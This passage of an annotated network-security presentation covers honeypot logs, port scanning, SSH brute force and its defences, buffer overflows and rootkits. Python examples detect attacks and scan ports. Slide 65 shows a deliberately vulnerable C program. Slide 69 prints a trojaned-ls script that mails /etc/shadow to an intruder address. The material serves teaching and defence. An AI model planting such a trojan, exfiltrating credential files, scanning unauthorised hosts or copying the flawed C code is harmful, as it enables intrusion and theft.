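            window: timedelta = timedelta(seconds=60)) -> Dict[str, object]:
    """Credential-guessing view of the records for one service: which sources
    made `threshold` attempts inside `window`, and which user names and
    passwords were tried most (both numbers are tuning assumptions)."""
    attempts: Dict[str, list] = defaultdict(list)
    users: Counter = Counter()
    passwords: Counter = Counter()
    for r in iter_records(text):
        if service not in r["service"]:
            continue
        for user, pw in CRED_RE.findall(r["payload"]):
            attempts[r["src"]].append((parse_ts(r["date"]), user, pw))
            users[user] += 1
            passwords[pw] += 1
    alerts: Dict[str, int] = {}
    for src, tries in attempts.items():
        tries.sort()
        # sliding window over the sorted attempt times
        for i in range(len(tries) - threshold + 1):
            if tries[i + threshold - 1][0] - tries[i][0] <= window:
                alerts[src] = len(tries)
                break
    return {"alerts": alerts,
            "top_users": users.most_common(3),
            "top_passwords": passwords.most_common(3)}


# Constructed sample: the five POP3 records from slide 46, one single attempt
# from another address (payload on two lines), and one HTTP record to ignore.
SAMPLE_SERVICE_LOG = """\
--MARK--,"Mon Dec 22 11:34:48 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54678,110,"USER root PASS root",--ENDMARK--
--MARK--,"Mon Dec 22 11:34:49 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54729,110,"USER root PASS root1",--ENDMARK--
--MARK--,"Mon Dec 22 11:34:50 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54731,110,"USER staff PASS staff",--ENDMARK--
--MARK--,"Mon Dec 22 11:34:52 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54774,110,"USER root PASS 12345",--ENDMARK--
--MARK--,"Mon Dec 22 11:34:53 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54774,110,"USER www PASS www",--ENDMARK--
--MARK--,"Mon Dec 22 11:40:00 WET 2008","exchange/POP3","10.0.0.5","192.168.1.50",40001,110,"USER ulisses
PASS wrong",--ENDMARK--
--MARK--,"Mon Dec 22 11:41:00 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",54941,80,"GET /index.php HTTP/1.1
User-Agent: Morfeus Scanner",--ENDMARK--
"""

if __name__ == "__main__":
    print(analyse(SAMPLE_SERVICE_LOG))
```

Because the same parser reads web.log, `analyse(text, service="HTTP")` is a no-op for credentials but `iter_records` gives you the HTTP payloads for the request inspection shown in the HTTP section.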
  • 48. SSH. Graph of the user names attempted (figure).
  • 49. SSH. Graph of the passwords attempted (figure).
  • 51. The threat.
  • 52. Port scanning: discovering machines and the ports they expose; crafting custom packets; hard to master; Nmap (insecure.org).
  • 53. Port scanning results. Open or Accepted: the machine replied indicating that a service is listening on that port. Closed, Denied or Not Listening: the machine replied indicating that any connection to the port will be refused. Filtered, Dropped or Blocked: no reply from the machine at all (typically a firewall dropping the probe).
  • 54. Port scanning techniques: TCP SYN (half-open), TCP Connect (full handshake), UDP.
  • 55. TCP Connect (figure).
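The TCP connect scan from slide 55, and the three states of slide 53, in working code. This is an added example written for this page, not code from the presentation or from Nmap: it completes the three-way handshake with the operating system's connect() and classifies the port by how the target answered. The self-check scans two ports on the loopback interface, one with a listener (open) and one just released (closed); the filtered state cannot be produced offline and is left to a real target behind a firewall.

```python
import socket
from concurrent.futures import ThreadPoolExecutor
from typing import Dict, Iterable, Tuple


def probe_port(host: str, port: int, timeout: float = 1.0) -> str:
    """TCP connect probe (what nmap -sT does): complete the three-way handshake
    and classify the port by how the target answered."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return "open"            # SYN/ACK came back and the handshake completed
        except socket.timeout:
            return "filtered"        # nothing came back: a firewall dropped the SYN
        except ConnectionRefusedError:
            return "closed"          # RST came back: host is up, nothing listens there
        except OSError:
            return "filtered"        # host/network unreachable: no service reachable either


def connect_scan(host: str, ports: Iterable[int], timeout: float = 1.0,
                 workers: int = 32) -> Dict[int, str]:
    """Scan several ports concurrently.  A connect scan is noisy: every open
    port sees a complete connection in its application log, which is why a
    SYN scan (nmap -sS, needs raw sockets) is preferred when stealth matters."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: probe_port(host, p, timeout), ports))
    return dict(zip(ports, states))


def loopback_demo() -> Tuple[Dict[int, str], int, int]:
    """Self-contained run: one listening socket on 127.0.0.1 (must show as open)
    and a port we bound and released (must show as closed)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]
    spare = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    spare.bind(("127.0.0.1", 0))
    closed_port = spare.getsockname()[1]
    spare.close()
    try:
        return connect_scan("127.0.0.1", [open_port, closed_port]), open_port, closed_port
    finally:
        listener.close()


if __name__ == "__main__":
    results, o, c = loopback_demo()
    print({o: results[o], c: results[c]})
```

Against the honeypot of slide 10 every configured port reports open and every other port closed, because the default TCP action is reset; a host whose unconfigured ports came back filtered would look different from the Windows 2000 personality it claims, which is one of the tells scanners use to spot honeypots.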
  • 56. Port scanning optimisation. -P0 (spelled -Pn in current Nmap) skips host discovery and scans every address, so hosts that do not answer ping are still found: three more hosts turn up for about the same run time:
    golden@golden-laptop:~$ sudo nmap -sS -sV 192.168.100.0/24
    ...
    Nmap finished: 256 IP addresses (29 hosts up) scanned in 2033.375 seconds
    golden@golden-laptop:~$ sudo nmap -sS -sV -P0 192.168.100.0/24
    ...
    Nmap finished: 256 IP addresses (32 hosts up) scanned in 2038.191 seconds
  • 57. Attack: brute force / dictionaries; exploitation of vulnerabilities.
  • 58. SSH: port 22; attacked by brute force / dictionaries; see cat /var/log/auth.log
  • 59. SSH - log
    Dec 24 01:24:46 golden-laptop sshd[23906]: Invalid user oracle from 89.235.152.18
    Dec 24 01:24:46 golden-laptop sshd[23906]: pam_unix(ssh:auth): check pass; user unknown
    Dec 24 01:24:46 golden-laptop sshd[23906]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
    Dec 24 01:24:48 golden-laptop sshd[23906]: Failed password for invalid user oracle from 89.235.152.18 port 48785 ssh2
    Dec 24 01:24:49 golden-laptop sshd[23908]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
    Dec 24 01:26:01 golden-laptop sshd[23963]: Invalid user test from 89.235.152.18
    Dec 24 01:26:01 golden-laptop sshd[23963]: pam_unix(ssh:auth): check pass; user unknown
    Dec 24 01:26:01 golden-laptop sshd[23963]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
    Dec 24 01:26:04 golden-laptop sshd[23963]: Failed password for invalid user test from 89.235.152.18 port 57886 ssh2
    Dec 24 01:26:05 golden-laptop sshd[23965]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
    Dec 24 01:26:21 golden-laptop sshd[23975]: Invalid user cvsuser from 89.235.152.18
    Dec 24 01:26:21 golden-laptop sshd[23975]: pam_unix(ssh:auth): check pass; user unknown
    Dec 24 01:26:21 golden-laptop sshd[23975]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
    Dec 24 01:26:22 golden-laptop sshd[23975]: Failed password for invalid user cvsuser from 89.235.152.18 port 59883 ssh2
    Dec 24 01:26:24 golden-laptop sshd[23977]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
  • 60. SSH. Defences: IPTables (block or rate-limit offending sources); stronger passwords; RSA key authentication.
  • 61. SSH passwords: minimum of 8 characters (a 2008 baseline; longer is better); nothing trivial; alphanumeric combinations; mnemonic: "Um Whiskey-Cola vale 3 euros no BA!" ("A whiskey and coke costs 3 euros at the BA!") = "UW-Cv3enBA!"
  • 62. SSH: http://www.passwordmeter.com/ (a strength meter; do not type a password you actually use into a third-party site).
  • 63. SSH - RSA authentication.
    1. Generate the key pair with "ssh-keygen -t rsa"; this creates ~/.ssh/id_rsa (private key) and ~/.ssh/id_rsa.pub (public key).
    2. On each machine we want to log in to (destination), append the generated id_rsa.pub to ~/.ssh/authorized_keys, for example with "cat id_rsa.pub >> ~/.ssh/authorized_keys".
    3. On each machine we log in from (origin), place id_rsa in ~/.ssh/ (better still, generate a separate key pair on each origin machine rather than copying the private key around).
    4. Finally disable password login by adding the line "PasswordAuthentication no" to /etc/ssh/sshd_config and restart the "sshd" daemon with "/etc/init.d/sshd restart"; do this only after confirming, in a second session, that key login works, or you lock yourself out.
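The "IPTables" defence of slide 60 starts from the auth.log of slide 59. The script below is an added example written for this page, not code from the presentation: it parses the sshd lines (invalid user, failed password, accepted login), counts failures per source, emits one iptables DROP rule per offender and, as a check on step 4 of the key-authentication procedure, lists password logins that came from an address which was also guessing. The threshold of three failures and the lines not taken from the slide (the single failure from 203.0.113.9, the two Accepted lines) are constructed assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

# sshd lines of interest, as they appear in /var/log/auth.log (slide 59).
INVALID_RE = re.compile(r"sshd\[\d+\]: Invalid user (?P<user>\S+) from (?P<ip>[\d.]+)")
FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
                       r"from (?P<ip>[\d.]+) port \d+ ssh2")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted (?P<method>\S+) for (?P<user>\S+) from (?P<ip>[\d.]+)")


def analyse_auth_log(lines: Iterable[str], threshold: int = 3) -> Tuple[Dict[str, dict], Dict[str, dict]]:
    """Per-source counts of failed passwords and the user names tried; sources
    at or above `threshold` failures are the offenders (threshold is an assumption)."""
    stats: Dict[str, dict] = defaultdict(lambda: {"failed": 0, "users": set(), "accepted": []})
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            s = stats[m["ip"]]
            s["failed"] += 1
            s["users"].add(m["user"])
            continue
        m = INVALID_RE.search(line)
        if m:
            stats[m["ip"]]["users"].add(m["user"])
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            stats[m["ip"]]["accepted"].append((m["user"], m["method"]))
    offenders = {ip: s for ip, s in stats.items() if s["failed"] >= threshold}
    return dict(stats), offenders


def iptables_rules(offenders: Dict[str, dict], port: int = 22) -> List[str]:
    """One DROP rule per offender, limited to the SSH port; -I inserts at the
    top of INPUT so the rule takes effect before any ACCEPT rule."""
    return [f"iptables -I INPUT -s {ip} -p tcp --dport {port} -j DROP" for ip in sorted(offenders)]


def password_logins_from_offenders(stats: Dict[str, dict]) -> List[Tuple[str, str]]:
    """A password success from an address that also failed deserves a look; with
    PasswordAuthentication no in sshd_config such a login cannot happen at all."""
    return [(ip, user) for ip, s in stats.items()
            for user, method in s["accepted"] if method == "password" and s["failed"] > 0]


# Sample: the three failures from slide 59, plus constructed lines for a single
# failure from another address, a password success from the offender, and a key login.
SAMPLE_AUTH_LOG = """\
Dec 24 01:24:46 golden-laptop sshd[23906]: Invalid user oracle from 89.235.152.18
Dec 24 01:24:48 golden-laptop sshd[23906]: Failed password for invalid user oracle from 89.235.152.18 port 48785 ssh2
Dec 24 01:24:49 golden-laptop sshd[23908]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
Dec 24 01:26:01 golden-laptop sshd[23963]: Invalid user test from 89.235.152.18
Dec 24 01:26:04 golden-laptop sshd[23963]: Failed password for invalid user test from 89.235.152.18 port 57886 ssh2
Dec 24 01:26:21 golden-laptop sshd[23975]: Invalid user cvsuser from 89.235.152.18
Dec 24 01:26:22 golden-laptop sshd[23975]: Failed password for invalid user cvsuser from 89.235.152.18 port 59883 ssh2
Dec 24 01:30:00 golden-laptop sshd[24001]: Failed password for root from 203.0.113.9 port 40000 ssh2
Dec 24 01:31:00 golden-laptop sshd[24010]: Accepted password for ulisses from 89.235.152.18 port 60001 ssh2
Dec 24 01:32:00 golden-laptop sshd[24020]: Accepted publickey for ulisses from 10.0.0.7 port 51000 ssh2
"""

if __name__ == "__main__":
    stats, offenders = analyse_auth_log(SAMPLE_AUTH_LOG.splitlines())
    for rule in iptables_rules(offenders):
        print(rule)
    print("password logins from offenders:", password_logins_from_offenders(stats))
```

Run periodically (or replace with fail2ban, which automates exactly this loop), the rules keep the dictionary bots off port 22; the last function exists because blocking is a stopgap, and only step 4 above, key-only authentication, makes the guessing pointless.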
  • 64. Vulnerabilities: behaviour not foreseen in a software artefact. Buffer overflow; unvalidated input; SQL injection.
  • 65. Exploitation of vulnerabilities. Exploit: the name given to a piece of code that exploits flaws in applications so as to cause behaviour in them that was not anticipated. The deliberately vulnerable program used in the demo (strcpy copies argv[1] into a 10-byte buffer with no length check; printf with a user-controlled format string is a second bug):
    #include <stdio.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char buffer[10];
        if (argc < 2)
            return 1;                /* no argument: nothing to copy */
        strcpy(buffer, argv[1]);     /* overflow: argv[1] longer than 9 chars + NUL */
        printf(buffer);              /* format string under the user's control */
        return 0;
    }
  • 66. Buffer overflow
    user@honeypot:~$ gcc exploit.c -o exploit
    user@honeypot:~$ ./exploit thisisanexploit
    *** stack smashing detected ***: ./exploit terminated
    thisisanexploitAborted
    One of gcc's defence mechanisms: the stack protector (-fstack-protector, on by default in Ubuntu's gcc) places a canary next to the saved return address and aborts the program when it finds the canary overwritten on return from main. It stops this overflow from hijacking control; it does nothing about the format-string bug.
  • 67. Shellcode: a set of instructions (in machine code or otherwise) written so that they can be injected into an application at run time. Illegal access to memory the process is not meant to reach; injection of the shellcode.
  • 68. Rootkits: a collection of malicious programs (trojans, backdoors, ...) an intruder installs to keep and hide access. Detection: chkrootkit and rkhunter (Linux; both available from the Ubuntu package manager); RootkitRevealer (Windows).
  • 69. Trojaned ls: a script that replaces /bin/ls with a wrapper that mails the shadow file to the intruder and then runs the real ls:
    #!/bin/bash
    mv /bin/ls /bin/ls.old
    /bin/echo "cat /etc/shadow | mail intruso@intruso.pt" > /bin/ls
    /bin/echo '/bin/ls.old "$@"' >> /bin/ls   # forward the user's arguments to the real ls
    chmod +x /bin/ls
  • 70. Conclusion.
